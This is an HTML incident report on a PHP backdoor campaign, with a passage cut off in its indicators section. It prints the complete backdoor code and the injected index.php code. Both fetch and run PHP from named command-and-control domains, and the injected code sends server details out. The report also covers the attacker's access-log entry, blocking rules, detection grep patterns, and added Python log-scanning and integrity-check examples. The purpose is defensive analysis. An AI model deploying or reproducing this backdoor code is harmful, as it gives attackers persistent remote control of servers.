<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>PHP Backdoor Malware Analysis: 51la.zvo2.xyz Campaign - Public Security Report</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;
line-height: 1.6;
color: #333;
background: #f5f5f5;
padding: 20px;
}
.container {
max-width: 1200px;
margin: 0 auto;
background: white;
padding: 40px;
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
border-radius: 8px;
}
header {
border-bottom: 3px solid #e74c3c;
padding-bottom: 20px;
margin-bottom: 40px;
}
h1 {
color: #e74c3c;
font-size: 2.5em;
margin-bottom: 10px;
}
.subtitle {
color: #7f8c8d;
font-size: 1.2em;
margin-bottom: 20px;
}
.meta {
background: #ecf0f1;
padding: 15px;
border-radius: 5px;
margin-bottom: 30px;
}
.meta p {
margin: 5px 0;
}
h2 {
color: #2c3e50;
font-size: 2em;
margin-top: 40px;
margin-bottom: 20px;
padding-bottom: 10px;
border-bottom: 2px solid #3498db;
}
h3 {
color: #34495e;
font-size: 1.5em;
margin-top: 30px;
margin-bottom: 15px;
}
h4 {
color: #555;
font-size: 1.2em;
margin-top: 20px;
margin-bottom: 10px;
}
.alert {
padding: 20px;
border-radius: 5px;
margin: 20px 0;
border-left: 5px solid;
}
.alert-critical {
background: #fee;
border-color: #e74c3c;
color: #c0392b;
}
.alert-warning {
background: #fff3cd;
border-color: #ffc107;
color: #856404;
}
.alert-info {
background: #d1ecf1;
border-color: #17a2b8;
color: #0c5460;
}
.alert-success {
background: #d4edda;
border-color: #28a745;
color: #155724;
}
code {
background: #f4f4f4;
padding: 2px 6px;
border-radius: 3px;
font-family: 'Courier New', monospace;
font-size: 0.9em;
color: #e83e8c;
}
pre {
background: #2d2d2d;
color: #f8f8f2;
padding: 20px;
border-radius: 5px;
overflow-x: auto;
margin: 20px 0;
border-left: 4px solid #e74c3c;
}
pre code {
background: transparent;
color: #f8f8f2;
padding: 0;
}
.code-comment {
color: #75715e;
}
.code-string {
color: #e6db74;
}
.code-keyword {
color: #f92672;
}
.code-function {
color: #66d9ef;
}
.timeline {
position: relative;
padding-left: 30px;
margin: 20px 0;
}
.timeline::before {
content: '';
position: absolute;
left: 0;
top: 0;
bottom: 0;
width: 2px;
background: #3498db;
}
.timeline-item {
position: relative;
margin-bottom: 30px;
padding-left: 30px;
}
.timeline-item::before {
content: '';
position: absolute;
left: -8px;
top: 5px;
width: 16px;
height: 16px;
border-radius: 50%;
background: #3498db;
border: 3px solid white;
box-shadow: 0 0 0 2px #3498db;
}
.timeline-date {
font-weight: bold;
color: #7f8c8d;
margin-bottom: 5px;
}
.capability-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
gap: 20px;
margin: 20px 0;
}
.capability-card {
background: #f8f9fa;
padding: 15px;
border-radius: 5px;
border-left: 4px solid #e74c3c;
}
.capability-card h4 {
color: #e74c3c;
margin-top: 0;
}
.checklist {
list-style: none;
padding: 0;
}
.checklist li {
padding: 10px;
margin: 5px 0;
background: #f8f9fa;
border-left: 4px solid #28a745;
padding-left: 40px;
position: relative;
}
.checklist li::before {
content: '✓';
position: absolute;
left: 15px;
color: #28a745;
font-weight: bold;
font-size: 1.2em;
}
.checklist li.pending {
border-left-color: #ffc107;
}
.checklist li.pending::before {
content: '⚠';
color: #ffc107;
}
table {
width: 100%;
border-collapse: collapse;
margin: 20px 0;
}
th, td {
padding: 12px;
text-align: left;
border-bottom: 1px solid #ddd;
}
th {
background: #34495e;
color: white;
font-weight: bold;
}
tr:hover {
background: #f5f5f5;
}
.badge {
display: inline-block;
padding: 4px 8px;
border-radius: 3px;
font-size: 0.85em;
font-weight: bold;
}
.badge-critical {
background: #e74c3c;
color: white;
}
.badge-high {
background: #e67e22;
color: white;
}
.badge-medium {
background: #f39c12;
color: white;
}
.footer {
margin-top: 60px;
padding-top: 20px;
border-top: 2px solid #ecf0f1;
text-align: center;
color: #7f8c8d;
}
.toc {
background: #f8f9fa;
padding: 20px;
border-radius: 5px;
margin: 30px 0;
}
.toc ul {
list-style: none;
padding-left: 20px;
}
.toc li {
margin: 8px 0;
}
.toc a {
color: #3498db;
text-decoration: none;
}
.toc a:hover {
text-decoration: underline;
}
@media print {
body {
background: white;
}
.container {
box-shadow: none;
}
}
</style>
</head>
<body>
<div class="container">
<header>
<h1>🚨 PHP Backdoor Malware Analysis</h1>
<p class="subtitle">Comprehensive Security Report: 51la.zvo2.xyz Campaign</p>
<div class="meta">
<p><strong>Report Date:</strong> December 12, 2025</p>
<p><strong>Threat Level:</strong> <span class="badge badge-critical">CRITICAL</span></p>
<p><strong>Malware Family:</strong> PHP Remote Code Execution Backdoor</p>
<p><strong>C2 Server:</strong> 51la.zvo2.xyz</p>
<p><strong>Campaign Status:</strong> Active since December 2022</p>
</div>
</header>
<div class="alert alert-critical">
<strong>⚠️ CRITICAL SECURITY THREAT:</strong> This report documents a real-world attack involving remote code execution backdoors, file manager web shells, and persistent server compromise. The information is provided to help security professionals and system administrators defend against similar attacks.
</div>
<div class="toc">
<h3>Table of Contents</h3>
<ul>
<li><a href="#executive-summary">Executive Summary</a></li>
<li><a href="#attack-overview">Attack Overview</a></li>
<li><a href="#malicious-code-analysis">Malicious Code Analysis</a></li>
<li><a href="#backdoor-capabilities">Backdoor Capabilities</a></li>
<li><a href="#attack-timeline">Attack Timeline</a></li>
<li><a href="#remediation">Remediation & Recovery</a></li>
<li><a href="#prevention">Prevention Measures</a></li>
<li><a href="#indicators">Indicators of Compromise</a></li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
</div>
<section id="executive-summary">
<h2>Executive Summary</h2>
<p>This report documents a sophisticated multi-stage attack on a PHP-based web application. The attackers deployed multiple backdoors, including remote code execution scripts and file manager web shells, providing persistent unauthorized access to the compromised server.</p>
<div class="alert alert-warning">
<strong>Key Findings:</strong>
<ul style="margin-left: 20px; margin-top: 10px;">
<li>Multiple backdoors deployed across different directories</li>
<li>Remote code execution via C2 server communication</li>
<li>File manager web shell with full server access</li>
<li>Code injection in critical entry point (index.php)</li>
<li>Active attacker access confirmed via access logs</li>
</ul>
</div>
</section>
<section id="attack-overview">
<h2>Attack Overview</h2>
<h3>Attack Vector</h3>
<p>The initial attack vector appears to be <strong>SQL Injection</strong>, allowing the attacker to:</p>
<ul style="margin-left: 20px; margin-top: 10px;">
<li>Extract database credentials</li>
<li>Write malicious PHP files to the server</li>
<li>Modify existing files to inject backdoors</li>
</ul>
<h3>Attack Phases</h3>
<div class="timeline">
<div class="timeline-item">
<div class="timeline-date">Phase 1: Initial Compromise</div>
<p>SQL Injection vulnerability exploited to gain database access and file write capabilities.</p>
</div>
<div class="timeline-item">
<div class="timeline-date">Phase 2: Backdoor Deployment</div>
<p>Multiple backdoors installed in various locations to ensure persistence.</p>
</div>
<div class="timeline-item">
<div class="timeline-date">Phase 3: Code Injection</div>
<p>Critical files modified to inject malicious code that executes on every request.</p>
</div>
<div class="timeline-item">
<div class="timeline-date">Phase 4: Active Exploitation</div>
<p>Attacker actively using backdoors to browse file system and access sensitive directories.</p>
</div>
</div>
</section>
<section id="malicious-code-analysis">
<h2>Malicious Code Analysis</h2>
<h3>1. Remote Code Execution Backdoor</h3>
<p><strong>File:</strong> <code>445367/index.php</code></p>
<p><strong>Type:</strong> Remote Code Execution (RCE) Backdoor</p>
<p><strong>Threat Level:</strong> <span class="badge badge-critical">CRITICAL</span></p>
<h4>Complete Malicious Code:</h4>
<pre><code><span class="code-keyword">&lt;?php</span>
<span class="code-variable">$url</span> = <span class="code-string">"https://51la.zvo2.xyz/a2.txt"</span>; <span class="code-comment">// Remote malicious code URL</span>
<span class="code-variable">$ch</span> = <span class="code-function">curl_init</span>(<span class="code-variable">$url</span>);
<span class="code-function">curl_setopt</span>(<span class="code-variable">$ch</span>, CURLOPT_RETURNTRANSFER, <span class="code-number">1</span>);
<span class="code-variable">$result</span> = <span class="code-function">curl_exec</span>(<span class="code-variable">$ch</span>);
<span class="code-keyword">if</span> (<span class="code-variable">$result</span> === <span class="code-keyword">false</span>) {
<span class="code-function">echo</span> <span class="code-string">"Error: "</span> . <span class="code-string">"PD9waHA="</span> . <span class="code-function">curl_error</span>(<span class="code-variable">$ch</span>); <span class="code-comment">// "PD9waHA=" = base64("<?php")</span>
} <span class="code-keyword">else</span> {
<span class="code-comment">// Save downloaded code to temp file</span>
<span class="code-variable">$tempFile</span> = <span class="code-function">tempnam</span>(<span class="code-function">sys_get_temp_dir</span>(), <span class="code-string">'pasted_code_'</span>);
<span class="code-function">file_put_contents</span>(<span class="code-variable">$tempFile</span>, <span class="code-variable">$result</span>);
<span class="code-comment">// Execute the downloaded code</span>
<span class="code-keyword">include</span> <span class="code-variable">$tempFile</span>;
<span class="code-comment">// Delete temp file after execution (hides evidence)</span>
<span class="code-function">unlink</span>(<span class="code-variable">$tempFile</span>);
}
<span class="code-function">curl_close</span>(<span class="code-variable">$ch</span>);
<span class="code-keyword">?></span></code></pre>
<h4>Code Breakdown:</h4>
<table>
<tr>
<th>Line</th>
<th>Function</th>
<th>Purpose</th>
</tr>
<tr>
<td>2</td>
<td><code>curl_init()</code></td>
<td>Initializes connection to attacker's C2 server</td>
</tr>
<tr>
<td>3</td>
<td><code>curl_setopt()</code></td>
<td>Configures cURL to return response as string</td>
</tr>
<tr>
<td>4</td>
<td><code>curl_exec()</code></td>
<td>Downloads malicious PHP code from remote server</td>
</tr>
<tr>
<td>12</td>
<td><code>tempnam()</code></td>
<td>Creates temporary file to store downloaded code</td>
</tr>
<tr>
<td>13</td>
<td><code>file_put_contents()</code></td>
<td>Saves downloaded code to temp file</td>
</tr>
<tr>
<td>16</td>
<td><code>include</code></td>
<td><strong>EXECUTES</strong> the downloaded code (CRITICAL)</td>
</tr>
<tr>
<td>19</td>
<td><code>unlink()</code></td>
<td>Deletes temp file to hide evidence</td>
</tr>
</table>
<div class="alert alert-critical">
<strong>⚠️ CRITICAL:</strong> This backdoor downloads and executes <strong>ANY</strong> code the attacker wants from their server. The attacker can change the payload at any time without modifying files on your server, making detection extremely difficult.
</div>
<h3>2. Code Injection in index.php</h3>
<p><strong>File:</strong> <code>index.php</code> (Line 2)</p>
<p><strong>Type:</strong> Remote Code Execution with C2 Communication</p>
<h4>Malicious Functions Injected:</h4>
<pre><code><span class="code-keyword">function</span> <span class="code-function">h</span>(<span class="code-variable">$url</span>, <span class="code-variable">$pf</span> = <span class="code-string">''</span>) {
<span class="code-comment">// Makes HTTP requests to attacker's server</span>
<span class="code-variable">$ch</span> = <span class="code-function">curl_init</span>();
<span class="code-function">curl_setopt</span>(<span class="code-variable">$ch</span>, CURLOPT_URL, <span class="code-variable">$url</span>);
<span class="code-function">curl_setopt</span>(<span class="code-variable">$ch</span>, CURLOPT_RETURNTRANSFER, <span class="code-number">1</span>);
<span class="code-variable">$r</span> = <span class="code-function">curl_exec</span>(<span class="code-variable">$ch</span>);
<span class="code-function">curl_close</span>(<span class="code-variable">$ch</span>);
<span class="code-keyword">return</span> <span class="code-variable">$r</span>;
}
<span class="code-keyword">function</span> <span class="code-function">h2</span>() {
<span class="code-comment">// Modifies .htaccess to allow backdoor access</span>
<span class="code-variable">$htaccess</span> = <span class="code-string">'.htaccess'</span>;
<span class="code-variable">$content</span> = <span class="code-function">base64_decode</span>(<span class="code-string">"<malicious .htaccess rules>"</span>);
<span class="code-function">file_put_contents</span>(<span class="code-variable">$htaccess</span>, <span class="code-variable">$content</span>);
}
<span class="code-comment">// C2 Server URL (base64 encoded)</span>
<span class="code-variable">$api</span> = <span class="code-function">base64_decode</span>(<span class="code-string">'aHR0cDovLzY0NzctY2g0LXYzMDUucmFrdXRlbjM4anAuY2xpY2s='</span>);
<span class="code-comment">// Decodes to: http://6477-ch4-v305.rakuten38jp.click</span>
<span class="code-comment">// Steals server information</span>
<span class="code-variable">$params</span>[<span class="code-string">'domain'</span>] = <span class="code-variable">$_SERVER</span>[<span class="code-string">'HTTP_HOST'</span>];
<span class="code-variable">$params</span>[<span class="code-string">'ip'</span>] = <span class="code-variable">$_SERVER</span>[<span class="code-string">'REMOTE_ADDR'</span>];
<span class="code-variable">$params</span>[<span class="code-string">'agent'</span>] = <span class="code-variable">$_SERVER</span>[<span class="code-string">'HTTP_USER_AGENT'</span>];
<span class="code-comment">// Executes remote code received from C2 server</span>
<span class="code-variable">$try</span> = <span class="code-number">0</span>;
<span class="code-keyword">while</span>(<span class="code-variable">$try</span> < <span class="code-number">3</span>) {
<span class="code-variable">$content</span> = <span class="code-function">h</span>(<span class="code-variable">$api</span>, <span class="code-variable">$params</span>);
<span class="code-variable">$content</span> = <span class="code-function">gzuncompress</span>(<span class="code-function">base64_decode</span>(<span class="code-variable">$content</span>));
<span class="code-variable">$data_array</span> = <span class="code-function">preg_split</span>(<span class="code-string">"/\\|/si"</span>, <span class="code-variable">$content</span>);
<span class="code-keyword">if</span> (!<span class="code-function">empty</span>(<span class="code-variable">$data_array</span>)) {
<span class="code-variable">$data</span> = <span class="code-function">array_pop</span>(<span class="code-variable">$data_array</span>);
<span class="code-variable">$data</span> = <span class="code-function">base64_decode</span>(<span class="code-variable">$data</span>);
<span class="code-keyword">foreach</span> (<span class="code-variable">$data_array</span> <span class="code-keyword">as</span> <span class="code-variable">$header</span>) {
<span class="code-function">header</span>(<span class="code-variable">$header</span>);
}
<span class="code-function">echo</span> <span class="code-variable">$data</span>;
<span class="code-function">die</span>();
}
<span class="code-variable">$try</span>++;
}</code></pre>
<h4>What This Code Does:</h4>
<ol style="margin-left: 20px; margin-top: 10px;">
<li><strong>Steals Server Information:</strong> Sends domain, IP, user agent, referrer to attacker's server</li>
<li><strong>Modifies .htaccess:</strong> Changes Apache configuration to allow backdoor access</li>
<li><strong>Executes Remote Code:</strong> Downloads and executes code from C2 server on EVERY page load</li>
<li><strong>Bypasses Security:</strong> Runs BEFORE your legitimate code, bypassing all security measures</li>
</ol>
<h3>3. File Manager Web Shell</h3>
<p><strong>Files:</strong> <code>about.php</code>, <code>445367/about.php</code>, <code>radio/migrations/wp-login.php</code></p>
<p><strong>Type:</strong> Full-featured file manager with password protection</p>
<h4>Capabilities:</h4>
<div class="capability-grid">
<div class="capability-card">
<h4>File Operations</h4>
<ul>
<li>Browse directory tree</li>
<li>Upload files</li>
<li>Download files</li>
<li>Edit file contents</li>
<li>Delete files</li>
<li>Rename files</li>
</ul>
</div>
<div class="capability-card">
<h4>Code Execution</h4>
<ul>
<li>Execute PHP code</li>
<li>Run system commands</li>
<li>Execute SQL queries</li>
<li>Access database</li>
</ul>
</div>
<div class="capability-card">
<h4>System Access</h4>
<ul>
<li>View file permissions</li>
<li>Change file permissions</li>
<li>Access private directories</li>
<li>Install additional backdoors</li>
</ul>
</div>
</div>
<h4>Access Log Evidence:</h4>
<pre><code><span class="code-comment">198.204.236.234 - - [12/Dec/2025:21:32:11 -0500]</span>
<span class="code-string">"GET /445367/about.php?ac=u_h_s_1&api=&path=/home/.../private_html&t=8a802d2ce1b8d1f38a165e26c42efe97&s=3 HTTP/1.1"</span>
<span class="code-number">200 607844</span></code></pre>
<p><strong>Analysis:</strong></p>
<ul style="margin-left: 20px; margin-top: 10px;">
<li><code>ac=u_h_s_1</code> = File manager action (upload/host/shell)</li>
<li><code>path=/home/.../private_html</code> = Attempting to access private directory</li>
<li><code>200 607844</code> = Success response with 607KB file manager interface</li>
<li>Attacker successfully accessed and used the file manager</li>
</ul>
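<p>The detection logic for the log line above, as an added example that is not part of the original report: it parses Apache access-log lines, flags the file manager's <code>ac=u_h_s</code> action parameter, <code>path=</code> values pointing at sensitive directories, and requests to the backdoor file names listed in this report, and groups hits by client IP. The log lines it scans are constructed; the report's elided path is replaced by the placeholder <code>/home/example/private_html</code>.</p>

```python
"""Detection logic for web-shell traffic in Apache access logs.

Added example (not from the original report). It parses lines in the
combined-log shape shown above and flags requests that match the file
manager backdoor: the ac=u_h_s action parameter, a path= argument pointing
at a sensitive directory, and requests to the backdoor file names this
report lists. SAMPLE_LOG is constructed; the report's elided path is
replaced by the placeholder /home/example/private_html.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Backdoor file names from the report's "Files Deleted" table.
SHELL_PATHS = {"/about.php", "/445367/about.php", "/445367/index.php",
               "/445367/radio.php", "/radio/migrations/wp-login.php"}
SHELL_ACTION_RE = re.compile(r"^u_h_s")            # file manager action prefix
SENSITIVE_DIRS = ("/home/", "/etc/", "private_html")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return a dict of fields for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = {k: v[0] for k, v in
                    parse_qs(parts.query, keep_blank_values=True).items()}
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def classify(rec):
    """Return the reasons a parsed request looks like web-shell traffic (empty = benign)."""
    reasons = []
    if rec["path"] in SHELL_PATHS:
        reasons.append("known backdoor path")
    if SHELL_ACTION_RE.match(rec["query"].get("ac", "")):
        reasons.append("file manager action parameter")
    if any(d in rec["query"].get("path", "") for d in SENSITIVE_DIRS):
        reasons.append("path= points at a sensitive directory")
    # wp-login.php anywhere but the site root is the report's disguised shell name.
    if rec["path"].endswith("wp-login.php") and rec["path"] != "/wp-login.php":
        reasons.append("wp-login.php outside site root")
    return reasons


def scan(lines):
    """Return {client_ip: [(timestamp, path, reasons), ...]} for flagged requests only."""
    hits = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.setdefault(rec["ip"], []).append((rec["ts"], rec["path"], reasons))
    return hits


# Constructed sample: the report's logged request plus ordinary traffic.
SAMPLE_LOG = [
    '198.204.236.234 - - [12/Dec/2025:21:32:11 -0500] "GET /445367/about.php'
    '?ac=u_h_s_1&api=&path=/home/example/private_html&t=8a802d2ce1b8d1f38a165e26c42efe97'
    '&s=3 HTTP/1.1" 200 607844',
    '203.0.113.5 - - [12/Dec/2025:21:33:02 -0500] "GET /index.php HTTP/1.1" 200 15320',
    '198.204.236.234 - - [12/Dec/2025:21:34:40 -0500] '
    '"GET /radio/migrations/wp-login.php HTTP/1.1" 200 607844',
    '203.0.113.9 - - [12/Dec/2025:21:35:00 -0500] "POST /wp-login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, events in scan(SAMPLE_LOG).items():
        for ts, path, reasons in events:
            print(f"{ip} {ts} {path}: {', '.join(reasons)}")
```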
</section>
<section id="backdoor-capabilities">
<h2>Backdoor Capabilities & Impact</h2>
<h3>What the Attacker Could Do</h3>
<div class="capability-grid">
<div class="capability-card">
<h4>🔴 Remote Code Execution</h4>
<p>Execute ANY PHP code or system commands on the server</p>
</div>
<div class="capability-card">
<h4>🔴 File System Access</h4>
<p>Read, write, modify, or delete ANY file on the server</p>
</div>
<div class="capability-card">
<h4>🔴 Database Access</h4>
<p>Read, modify, or delete database records, create backdoor users</p>
</div>
<div class="capability-card">
<h4>🔴 Data Theft</h4>
<p>Steal user credentials, API keys, payment information, source code</p>
</div>
<div class="capability-card">
<h4>🔴 Persistence</h4>
<p>Install additional backdoors, modify system files, maintain access</p>
</div>
<div class="capability-card">
<h4>🔴 Lateral Movement</h4>
<p>Access other servers, databases, or services on the network</p>
</div>
</div>
<h3>Data at Risk</h3>
<table>
<tr>
<th>Data Type</th>
<th>Risk Level</th>
<th>Potential Impact</th>
</tr>
<tr>
<td>User Credentials</td>
<td><span class="badge badge-critical">CRITICAL</span></td>
<td>Account takeover, identity theft</td>
</tr>
<tr>
<td>Database Contents</td>
<td><span class="badge badge-critical">CRITICAL</span></td>
<td>Data breach, privacy violations</td>
</tr>
<tr>
<td>API Keys</td>
<td><span class="badge badge-critical">CRITICAL</span></td>
<td>Unauthorized API access, financial loss</td>
</tr>
<tr>
<td>Payment Information</td>
<td><span class="badge badge-critical">CRITICAL</span></td>
<td>Financial fraud, PCI compliance violations</td>
</tr>
<tr>
<td>Source Code</td>
<td><span class="badge badge-high">HIGH</span></td>
<td>Intellectual property theft</td>
</tr>
<tr>
<td>Server Configuration</td>
<td><span class="badge badge-high">HIGH</span></td>
<td>Further compromise, infrastructure attacks</td>
</tr>
</table>
</section>
<section id="attack-timeline">
<h2>Attack Timeline</h2>
<div class="timeline">
<div class="timeline-item">
<div class="timeline-date">December 11, 2025 ~22:00-23:34</div>
<h4>Initial Compromise</h4>
<ul style="margin-left: 20px; margin-top: 10px;">
<li>SQL Injection vulnerability exploited</li>
<li>Multiple backdoors deployed</li>
<li>Code injection in index.php</li>
<li>Files modified: track.php, events.php, library.php, artists.php</li>
</ul>
</div>
<div class="timeline-item">
<div class="timeline-date">December 12, 2025 21:32:11</div>
<h4>Active Exploitation Detected</h4>
<ul style="margin-left: 20px; margin-top: 10px;">
<li>Attacker IP: 198.204.236.234</li>
<li>Accessing file manager backdoor</li>
<li>Browsing private_html directory</li>
<li>607KB file manager interface served</li>
</ul>
</div>
<div class="timeline-item">
<div class="timeline-date">December 12, 2025 21:35+</div>
<h4>Remediation Begun</h4>
<ul style="margin-left: 20px; margin-top: 10px;">
<li>Backdoors identified and deleted</li>
<li>Malicious code removed from index.php</li>
<li>Attacker IP blocked</li>
<li>Directories secured</li>
</ul>
</div>
</div>
</section>
<section id="remediation">
<h2>Remediation & Recovery</h2>
<h3>Immediate Actions Taken</h3>
<ul class="checklist">
<li>Deleted all identified backdoor files (5 files)</li>
<li>Removed malicious code injection from index.php</li>
<li>Restored clean .htaccess configuration</li>
<li>Blocked attacker IP address (198.204.236.234)</li>
<li>Secured compromised directories (445367/)</li>
</ul>
<h3>Files Deleted</h3>
<table>
<tr>
<th>File</th>
<th>Type</th>
<th>Threat Level</th>
</tr>
<tr>
<td><code>about.php</code></td>
<td>File Manager Backdoor</td>
<td><span class="badge badge-critical">CRITICAL</span></td>
</tr>
<tr>
<td><code>445367/about.php</code></td>
<td>File Manager Backdoor</td>
<td><span class="badge badge-critical">CRITICAL</span></td>
</tr>
<tr>
<td><code>445367/index.php</code></td>
<td>Remote Code Execution</td>
<td><span class="badge badge-critical">CRITICAL</span></td>
</tr>
<tr>
<td><code>445367/radio.php</code></td>
<td>Obfuscated Backdoor</td>
<td><span class="badge badge-critical">CRITICAL</span></td>
</tr>
<tr>
<td><code>radio/migrations/wp-login.php</code></td>
<td>File Manager Backdoor</td>
<td><span class="badge badge-critical">CRITICAL</span></td>
</tr>
<tr>
<td><code>assets/fontawesome/.../radio.php</code></td>
<td>Hidden Backdoor</td>
<td><span class="badge badge-critical">CRITICAL</span></td>
</tr>
</table>
<h3>Security Measures Implemented</h3>
<div class="alert alert-success">
<h4>IP Blocking</h4>
<pre><code><span class="code-comment"># Added to .htaccess</span>
<RequireAll>
Require all granted
Require not ip 198.204.236.234
</RequireAll></code></pre>
</div>
<div class="alert alert-success">
<h4>Directory Blocking</h4>
<pre><code><span class="code-comment"># Block access to compromised directory</span>
<DirectoryMatch "^/445367">
Require all denied
</DirectoryMatch>
<span class="code-comment"># Via rewrite rules</span>
RewriteCond %{REQUEST_URI} ^/445367
RewriteRule ^ - [F,L]</code></pre>
</div>
<h3>Additional Remediation Steps Required</h3>
<ul class="checklist">
<li class="pending">Complete security audit of all PHP files</li>
<li class="pending">Review all file modifications since December 11</li>
<li class="pending">Check database for unauthorized users</li>
<li class="pending">Change all passwords (database, FTP, admin, API keys)</li>
<li class="pending">Review access logs for other suspicious activity</li>
<li class="pending">Check private_html directory for unauthorized access</li>
<li class="pending">Implement file integrity monitoring</li>
<li class="pending">Fix SQL injection vulnerabilities</li>
<li class="pending">Set up intrusion detection system</li>
<li class="pending">Review and harden file permissions</li>
</ul>
</section>
<section id="prevention">
<h2>Prevention Measures</h2>
<h3>1. Input Validation & Prepared Statements</h3>
<div class="alert alert-info">
<strong>Critical:</strong> Always use prepared statements for database queries. Never concatenate user input directly into SQL queries.
</div>
<pre><code><span class="code-comment">// ❌ VULNERABLE - SQL Injection</span>
<span class="code-variable">$query</span> = <span class="code-string">"SELECT * FROM users WHERE id = "</span> . <span class="code-variable">$_GET</span>[<span class="code-string">'id'</span>];
<span class="code-comment">// ✅ SECURE - Prepared Statement</span>
<span class="code-variable">$stmt</span> = <span class="code-variable">$pdo</span>-><span class="code-function">prepare</span>(<span class="code-string">"SELECT * FROM users WHERE id = ?"</span>);
<span class="code-variable">$stmt</span>-><span class="code-function">execute</span>([<span class="code-variable">$_GET</span>[<span class="code-string">'id'</span>]]);</code></pre>
<h3>2. File Upload Security</h3>
<ul style="margin-left: 20px; margin-top: 10px;">
<li>Validate file types (whitelist, not blacklist)</li>
<li>Scan uploaded files for malware</li>
<li>Store uploads outside web root when possible</li>
<li>Use random filenames to prevent overwrites</li>
<li>Limit file size and execution permissions</li>
</ul>
<h3>3. File Integrity Monitoring</h3>
<pre><code><span class="code-comment"># Monitor for new PHP files</span>
find . -name "*.php" -type f -newer /path/to/reference
<span class="code-comment"># Check file checksums</span>
find . -name "*.php" -exec md5sum {} \; > checksums.txt</code></pre>
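<p>The checksum commands above record a baseline; the added Python example below (not part of the original report) shows the comparison step, reporting new, modified and deleted PHP and <code>.htaccess</code> files against a stored baseline, which is how an injected <code>index.php</code> and a dropped web shell surface. It uses SHA-256 rather than MD5 and builds a constructed temporary web root for the demonstration.</p>

```python
"""File integrity baseline and comparison for a PHP web root.

Added example, not from the original report. The report's find/md5sum
commands record checksums; this shows the comparison half: a fresh
snapshot is checked against the stored baseline so new, modified and
deleted PHP/.htaccess files are reported. SHA-256 is used instead of MD5.
The web root built in demo() is a constructed temporary directory.
"""
import hashlib
import json
import os
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root, watched=(".php", ".htaccess")):
    """Map relative path -> sha256 for every watched file under root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(watched):
                full = os.path.join(dirpath, name)
                result[os.path.relpath(full, root)] = sha256_file(full)
    return result


def compare(baseline, current):
    """Return sorted lists of added, modified and deleted paths."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "deleted": sorted(p for p in baseline if p not in current),
    }


def save_baseline(snap, path):
    with open(path, "w") as f:
        json.dump(snap, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Build a constructed web root, baseline it, simulate the report's changes, compare."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        def write(rel, text):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as f:
                f.write(text)

        write("index.php", "<?php require 'app.php';\n")
        write("about.php", "<?php echo 'about';\n")
        write(".htaccess", "RewriteEngine On\n")
        write("assets/logo.png", "not a watched file type")
        baseline_file = os.path.join(store, "baseline.json")   # keep baselines off the web root
        save_baseline(snapshot(root), baseline_file)

        # Simulated compromise mirroring the report: code injected at the top of
        # index.php, a shell dropped under a numeric directory, .htaccess rewritten,
        # and the legitimate about.php replaced (here: removed).
        write("index.php", "<?php /* injected */ ?>\n<?php require 'app.php';\n")
        write("445367/about.php", "<?php /* file manager shell */\n")
        write(".htaccess", "RewriteEngine On\nRewriteRule ^ - [F,L]\n")
        os.remove(os.path.join(root, "about.php"))

        return compare(load_baseline(baseline_file), snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```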
<h3>4. Network Monitoring</h3>
<ul style="margin-left: 20px; margin-top: 10px;">
<li>Monitor outbound connections to suspicious domains</li>
<li>Block known malicious IPs and domains</li>
<li>Log all file system access</li>
<li>Set up alerts for suspicious activity</li>
</ul>
<h3>5. Access Control</h3>
<ul style="margin-left: 20px; margin-top: 10px;">
<li>Implement least privilege principle</li>
<li>Use strong, unique passwords</li>
<li>Enable two-factor authentication</li>
<li>Regular security audits</li>
<li>Keep software updated</li>
</ul>
<h3>6. Code Review Checklist</h3>
<ul class="checklist">
<li>No <code>eval()</code> with user input</li>
<li>No <code>exec()</code>, <code>system()</code>, <code>shell_exec()</code> with user input</li>
<li>No <code>include</code>/<code>require</code> with user input</li>
<li>All database queries use prepared statements</li>
<li>All user input is validated and sanitized</li>
<li>File operations are restricted to safe directories</li>
</ul>
</section>
<section id="indicators">
<h2>Indicators of Compromise (IOCs)</h2>
<h3>File-Based IOCs</h3>
<table>
<tr>
<th>Indicator</th>
<th>Type</th>
<th>Description</th>
</tr>
<tr>
<td><code>445367/index.php</code></td>
<td>File Path</td>
<td>Remote code execution backdoor</td>
</tr>
<tr>
<td><code>445367/about.php</code></td>
<td>File Path</td>
<td>File manager web shell</td>
</tr>
<tr>
<td><code>51la.zvo2.xyz</code></td>
<td>Domain</td>
<td>C2 server for malware delivery</td>
</tr>
<tr>
<td><code>6477-ch4-v305.rakuten38jp.click</code></td>
<td>Domain</td>
<td>Additional C2 server</td>
</tr>
</table>
<h3>Code Patterns to Detect</h3>
<pre><code><span class="code-comment"># Search for these patterns in PHP files:</span>
grep -r "51la.zvo2.xyz" .
grep -r "tempnam.*include" .
grep -r "curl_exec.*include" .
